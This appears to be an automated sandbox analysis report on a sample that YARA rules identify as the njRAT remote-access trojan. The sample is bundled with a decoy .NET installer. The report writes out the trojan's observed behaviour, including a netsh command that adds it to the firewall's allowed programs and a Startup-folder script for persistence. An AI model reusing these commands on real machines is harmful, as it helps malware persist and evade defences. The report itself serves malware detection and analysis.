        Source: 11.2.essam@sasa2023.exe.2ada100.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 11.2.essam@sasa2023.exe.2ada100.0.raw.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 11.2.essam@sasa2023.exe.2ada100.0.raw.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 11.2.essam@sasa2023.exe.2ada100.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
        Source: 11.2.essam@sasa2023.exe.2aeb7cc.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 11.2.essam@sasa2023.exe.2aeb7cc.2.raw.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 11.2.essam@sasa2023.exe.2aeb7cc.2.raw.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 11.2.essam@sasa2023.exe.2aeb7cc.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
        Source: 0000000B.00000002.1945798119.0000000002ACB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 0000000B.00000002.1945798119.0000000002ACB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 0000000B.00000002.1945798119.0000000002ACB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 0000000B.00000002.1946499918.0000000004CC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 0000000B.00000002.1946499918.0000000004CC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0000000B.00000002.1946499918.0000000004CC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 0000000B.00000002.1946499918.0000000004CC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 0000000B.00000002.1946499918.0000000004CC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeCode function: 4_2_69DA4E0D ExitWindowsEx,4_2_69DA4E0D
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeCode function: String function: 69DA85BC appears 56 times
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeCode function: String function: 69DC8B7A appears 109 times
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeCode function: String function: 6990265B appears 183 times
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeCode function: String function: 69DD6E1A appears 546 times
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeCode function: String function: 698EE8E8 appears 149 times
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeCode function: String function: 69DA833E appears 579 times
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeCode function: String function: 69D739AD appears 43 times
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeCode function: String function: 0001854A appears 42 times
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeCode function: String function: 00034DF4 appears 54 times
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeCode function: 2_2_00017A0A: GetDriveTypeW,SetErrorMode,SetErrorMode,SetErrorMode,CreateFileW,DeviceIoControl,CloseHandle,SetErrorMode,2_2_00017A0A
        Source: SetupResources.dll11.2.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
        Source: SetupResources.dll4.2.drStatic PE information: No import functions for PE file found
        Source: SetupResources.dll1.2.drStatic PE information: No import functions for PE file found
        Source: SetupResources.dll22.2.drStatic PE information: No import functions for PE file found
        Source: SetupResources.dll.2.drStatic PE information: No import functions for PE file found
        Source: SetupResources.dll14.2.drStatic PE information: No import functions for PE file found
        Source: SetupResources.dll17.2.drStatic PE information: No import functions for PE file found
        Source: SetupResources.dll10.2.drStatic PE information: No import functions for PE file found
        Source: SetupResources.dll13.2.drStatic PE information: No import functions for PE file found
        Source: SetupResources.dll19.2.drStatic PE information: No import functions for PE file found
        Source: SetupResources.dll9.2.drStatic PE information: No import functions for PE file found
        Source: SetupResources.dll5.2.drStatic PE information: No import functions for PE file found
        Source: SetupResources.dll2.2.drStatic PE information: No import functions for PE file found
        Source: SetupResources.dll16.2.drStatic PE information: No import functions for PE file found
        Source: SetupResources.dll21.2.drStatic PE information: No import functions for PE file found
        Source: SetupResources.dll18.2.drStatic PE information: No import functions for PE file found
        Source: SetupResources.dll15.2.drStatic PE information: No import functions for PE file found
        Source: SetupResources.dll8.2.drStatic PE information: No import functions for PE file found
        Source: SetupResources.dll23.2.drStatic PE information: No import functions for PE file found
        Source: SetupResources.dll12.2.drStatic PE information: No import functions for PE file found
        Source: SetupResources.dll3.2.drStatic PE information: No import functions for PE file found
        Source: SetupResources.dll6.2.drStatic PE information: No import functions for PE file found
        Source: SetupResources.dll20.2.drStatic PE information: No import functions for PE file found
        Source: SetupResources.dll0.2.drStatic PE information: No import functions for PE file found
        Source: SetupResources.dll11.2.drStatic PE information: No import functions for PE file found
        Source: SetupResources.dll7.2.drStatic PE information: No import functions for PE file found
        Source: ESjy0irMIn.exe, 00000000.00000002.1752276948.0000000002442000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedotNetFx40_Client_setup.exet* vs ESjy0irMIn.exe
        Source: ESjy0irMIn.exe, 00000000.00000002.1753786714.000000001DEC5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedotNetFx40_Client_setup.exet* vs ESjy0irMIn.exe
        Source: ESjy0irMIn.exe, 00000000.00000000.1719084397.0000000000152000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamedotNetFx40_Client_setup.exet* vs ESjy0irMIn.exe
        Source: ESjy0irMIn.exe, 00000000.00000000.1719084397.0000000000152000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameBoxStub.exeT vs ESjy0irMIn.exe
        Source: ESjy0irMIn.exe, 00000000.00000000.1719263302.000000000025A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameBlackBinderStub.exel% vs ESjy0irMIn.exe
        Source: ESjy0irMIn.exeBinary or memory string: OriginalFilenamedotNetFx40_Client_setup.exet* vs ESjy0irMIn.exe
        Source: ESjy0irMIn.exeBinary or memory string: OriginalFilenameBoxStub.exeT vs ESjy0irMIn.exe
        Source: ESjy0irMIn.exeBinary or memory string: OriginalFilenameBlackBinderStub.exel% vs ESjy0irMIn.exe
        Source: ESjy0irMIn.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: ESjy0irMIn.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ESjy0irMIn.exe.logJump to behavior
        Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@20/146@4/1
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeCode function: 2_2_00018DAE FormatMessageW,GetLastError,LocalFree,2_2_00018DAE
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeCode function: 4_2_69D9E9B4 ChangeServiceConfigW,4_2_69D9E9B4
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeCode function: 4_2_698F7A10 LoadResource,LockResource,SizeofResource,4_2_698F7A10
        Source: ESjy0irMIn.exeReversingLabs: Detection: 73%
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\ESjy0irMIn.exe C:\Users\user\Desktop\ESjy0irMIn.exe
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeProcess created: C:\ProgramData\dotNetFx40_Client_setup.exe "C:\ProgramData\dotNetFx40_Client_setup.exe"
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeProcess created: C:\ProgramData\essam@sasa2023.exe "C:\ProgramData\essam@sasa2023.exe"
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeProcess created: C:\b53dd3b256ba71dad061693a386e\Setup.exe C:\b53dd3b256ba71dad061693a386e\\Setup.exe /x86 /x64 /ia64 /web
        Source: C:\ProgramData\essam@sasa2023.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram "C:\ProgramData\essam@sasa2023.exe" "essam@sasa2023.exe" ENABLE
        Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Name.js"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\ProgramData\essam@sasa2023.exe "C:\ProgramData\essam@sasa2023.exe"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\ProgramData\essam@sasa2023.exe "C:\ProgramData\essam@sasa2023.exe"
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /i "C:\Users\user\AppData\Local\Temp\BlockersInfo1.rtf
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /i "C:\Users\user\AppData\Local\Temp\BlockersInfo2.rtf
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeProcess created: C:\ProgramData\dotNetFx40_Client_setup.exe "C:\ProgramData\dotNetFx40_Client_setup.exe" Jump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeProcess created: C:\ProgramData\essam@sasa2023.exe "C:\ProgramData\essam@sasa2023.exe" Jump to behavior
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeProcess created: C:\b53dd3b256ba71dad061693a386e\Setup.exe C:\b53dd3b256ba71dad061693a386e\\Setup.exe /x86 /x64 /ia64 /webJump to behavior
        Source: C:\ProgramData\essam@sasa2023.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram "C:\ProgramData\essam@sasa2023.exe" "essam@sasa2023.exe" ENABLEJump to behavior
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /i "C:\Users\user\AppData\Local\Temp\BlockersInfo1.rtfJump to behavior
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /i "C:\Users\user\AppData\Local\Temp\BlockersInfo2.rtfJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\ProgramData\essam@sasa2023.exe "C:\ProgramData\essam@sasa2023.exe" Jump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
        Source: C:\ProgramData\essam@sasa2023.exeCode function: 3_2_05171832 AdjustTokenPrivileges,3_2_05171832
        Source: C:\ProgramData\essam@sasa2023.exeCode function: 3_2_051717FB AdjustTokenPrivileges,3_2_051717FB
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeCode function: 4_2_69DA4DC9 AdjustTokenPrivileges,4_2_69DA4DC9
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\Users\user\AppData\Local\Temp\dd_dotNetFx40_Client_setup_decompression_log.txtJump to behavior
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeCode function: 4_2_698F697A __EH_prolog3,CoCreateInstance,PathIsRelativeW,PathFileExistsW,PathFileExistsW,PathFileExistsW,PathFileExistsW,CoCreateInstance,VariantClear,PathIsRelativeW,PathFileExistsW,PathFileExistsW,PathFileExistsW,PathFileExistsW,VariantClear,__CxxThrowException@8,VariantClear,VariantClear,VariantClear,4_2_698F697A
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeCode function: 2_2_0001774A GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLastError,GetLogicalDriveStringsW,CharUpperW,_wcschr,GetDiskFreeSpaceExW,2_2_0001774A
        Source: ESjy0irMIn.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.69%
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dllJump to behavior
        Source: C:\ProgramData\essam@sasa2023.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\276d7f4a20a3c21c3bf6fc9bfc1915a2\mscorlib.ni.dllJump to behavior
        Source: C:\ProgramData\essam@sasa2023.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
        Source: C:\ProgramData\essam@sasa2023.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
        Source: C:\ProgramData\essam@sasa2023.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\276d7f4a20a3c21c3bf6fc9bfc1915a2\mscorlib.ni.dll
        Source: C:\ProgramData\essam@sasa2023.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
        Source: C:\ProgramData\essam@sasa2023.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeCode function: 4_2_698DEFE2 CreateToolhelp32Snapshot,_memset,Process32FirstW,Process32NextW,FindCloseChangeNotification,4_2_698DEFE2
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeMutant created: \Sessions\1\BaseNamedObjects\Global\NetFxSetupMutex
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7400:120:WilError_03
        Source: C:\ProgramData\essam@sasa2023.exeMutant created: \Sessions\1\BaseNamedObjects\7968e3cc8ecdfdd08a129deabeee4932
        Source: C:\ProgramData\essam@sasa2023.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeCommand line argument: X?f2_2_000159A6
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeCommand line argument: temp2_2_000159A6
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeCommand line argument: X?f2_2_000159A6
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeCommand line argument: X?f2_2_000159A6
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeCommand line argument: X?f2_2_000159A6
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeCommand line argument: X?f2_2_000159A6
        Source: Setup.exeString found in binary or memory: Pre-Installation Warnings:
        Source: essam@sasa2023.exe.0.dr, CLASS4E803AB8F76B9B9B9B153A22B34577EE5631DDB830601D56AB39010530F75CLASSWQOR4E803AB8F76B9B9B9B153A22B34577EE5631DDB830601D56AB39010530F75.csCryptographic APIs: 'TransformFinalBlock'
        Source: 0.0.ESjy0irMIn.exe.22b53c.2.raw.unpack, CLASS4E803AB8F76B9B9B9B153A22B34577EE5631DDB830601D56AB39010530F75CLASSWQOR4E803AB8F76B9B9B9B153A22B34577EE5631DDB830601D56AB39010530F75.csCryptographic APIs: 'TransformFinalBlock'
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MsftEdit.dll
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEWindow detected: Number of UI elements: 13
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEWindow detected: Number of UI elements: 13
        Source: C:\ProgramData\essam@sasa2023.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dllJump to behavior
        Source: ESjy0irMIn.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
        Source: C:\ProgramData\essam@sasa2023.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dllJump to behavior
        Source: ESjy0irMIn.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
        Source: ESjy0irMIn.exeStatic file information: File size 1078272 > 1048576
        Source: ESjy0irMIn.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x106800
        Source: ESjy0irMIn.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: sqmapi.pdb source: dotNetFx40_Client_setup.exe, 00000002.00000003.1762753670.00000000006AA000.00000004.00000020.00020000.00000000.sdmp, dotNetFx40_Client_setup.exe, 00000002.00000003.1762071417.0000000005261000.00000004.00000020.00020000.00000000.sdmp, dotNetFx40_Client_setup.exe, 00000002.00000003.1762660238.00000000006A3000.00000004.00000020.00020000.00000000.sdmp, dotNetFx40_Client_setup.exe, 00000002.00000003.1762608912.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, Setup.exe, 00000004.00000002.4207935822.0000000069A71000.00000020.00000001.01000000.0000000F.sdmp, sqmapi.dll.2.dr
        Source: Binary string: SetupEngine.pdb source: dotNetFx40_Client_setup.exe, 00000002.00000003.1762071417.0000000004EE3000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, Setup.exe, 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, SetupEngine.dll.2.dr
        Source: Binary string: boxstub.pdb source: ESjy0irMIn.exe, dotNetFx40_Client_setup.exe.0.dr
        Source: Binary string: SetupUtility.pdb source: dotNetFx40_Client_setup.exe, 00000002.00000003.1762071417.0000000004EE3000.00000004.00000020.00020000.00000000.sdmp, SetupUtility.exe.2.dr
        Source: Binary string: Setup.pdb source: dotNetFx40_Client_setup.exe, 00000002.00000003.1762071417.0000000004EE3000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, Setup.exe, 00000004.00000002.4195199090.00000000009A1000.00000020.00000001.01000000.0000000D.sdmp, Setup.exe, 00000004.00000000.1763277251.00000000009A1000.00000020.00000001.01000000.0000000D.sdmp, Setup.exe.2.dr
        Source: Binary string: SetupResources.pdb source: dotNetFx40_Client_setup.exe, 00000002.00000003.1762071417.0000000005261000.00000004.00000020.00020000.00000000.sdmp, SetupResources.dll14.2.dr, SetupResources.dll18.2.dr, SetupResources.dll4.2.dr, SetupResources.dll9.2.dr, SetupResources.dll11.2.dr, SetupResources.dll15.2.dr, SetupResources.dll17.2.dr, SetupResources.dll13.2.dr, SetupResources.dll20.2.dr, SetupResources.dll3.2.dr, SetupResources.dll21.2.dr, SetupResources.dll22.2.dr, SetupResources.dll1.2.dr, SetupResources.dll6.2.dr, SetupResources.dll19.2.dr, SetupResources.dll7.2.dr, SetupResources.dll.2.dr, SetupResources.dll5.2.dr, SetupResources.dll16.2.dr, SetupResources.dll2.2.dr, SetupResources.dll0.2.dr, SetupResources.dll23.2.dr, SetupResources.dll8.2.dr, SetupResources.dll12.2.dr, SetupResources.dll10.2.dr
        Source: Binary string: SetupUi.pdb source: dotNetFx40_Client_setup.exe, 00000002.00000003.1762071417.0000000005261000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, Setup.exe, 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, SetupUi.dll.2.dr

        Data Obfuscation

        barindex
        .NET source code contains potential unpacker
        Source: 11.2.essam@sasa2023.exe.4cc0000.5.raw.unpack, OK.cs.Net Code: Plugin System.Reflection.Assembly.Load(byte[])
        Source: 11.2.essam@sasa2023.exe.2ab6fa0.1.raw.unpack, SSLOLCZBV.cs.Net Code: Main System.AppDomain.Load(byte[])
        Source: 11.2.essam@sasa2023.exe.2ada100.0.raw.unpack, OK.cs.Net Code: Plugin System.Reflection.Assembly.Load(byte[])
        Source: 11.2.essam@sasa2023.exe.4ca0000.4.raw.unpack, SSLOLCZBV.cs.Net Code: Main System.AppDomain.Load(byte[])
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeCode function: 0_2_00007FFD9B76D2A5 pushad ; iretd 0_2_00007FFD9B76D2A6
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeCode function: 0_2_00007FFD9B88063D push ebx; iretd 0_2_00007FFD9B88066A
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeCode function: 2_2_0002AB05 push ecx; ret 2_2_0002AB18
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeCode function: 2_2_00034EE0 push ecx; ret 2_2_00034EF3
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeCode function: 4_2_009A3DF5 push ecx; ret 4_2_009A3E08
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeCode function: 4_2_698FAA75 push ecx; ret 4_2_698FAA88
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeCode function: 4_2_69902709 push ecx; ret 4_2_6990271C
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeCode function: 4_2_69A74821 push ecx; ret 4_2_69A74834
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeCode function: 4_2_69A71B89 push ecx; ret 4_2_69A71B9C
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeCode function: 4_2_69DD6F06 push ecx; ret 4_2_69DD6F19
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeCode function: 4_2_69DCE265 push ecx; ret 4_2_69DCE278
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeCode function: 2_2_0001B4B3 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,2_2_0001B4B3
        Source: dotNetFx40_Client_setup.exe.0.drStatic PE information: section name: .boxld01
        Source: initial sampleStatic PE information: section name: .text entropy: 7.749537444364443
        Source: initial sampleStatic PE information: section name: .text entropy: 6.981580872742712
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeFile created: C:\ProgramData\dotNetFx40_Client_setup.exeJump to dropped file
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeFile created: C:\ProgramData\essam@sasa2023.exeJump to dropped file
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\2052\SetupResources.dllJump to dropped file
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\1049\SetupResources.dllJump to dropped file
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\1044\SetupResources.dllJump to dropped file
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\1043\SetupResources.dllJump to dropped file
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\1042\SetupResources.dllJump to dropped file
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\1045\SetupResources.dllJump to dropped file
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\1046\SetupResources.dllJump to dropped file
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\1055\SetupResources.dllJump to dropped file
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\1025\SetupResources.dllJump to dropped file
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\3082\SetupResources.dllJump to dropped file
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\1053\SetupResources.dllJump to dropped file
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\1029\SetupResources.dllJump to dropped file
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeFile created: C:\ProgramData\dotNetFx40_Client_setup.exeJump to dropped file
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\1028\SetupResources.dllJump to dropped file
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\SetupEngine.dllJump to dropped file
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\1033\SetupResources.dllJump to dropped file
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\Setup.exeJump to dropped file
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\1035\SetupResources.dllJump to dropped file
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\SetupUtility.exeJump to dropped file
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\1036\SetupResources.dllJump to dropped file
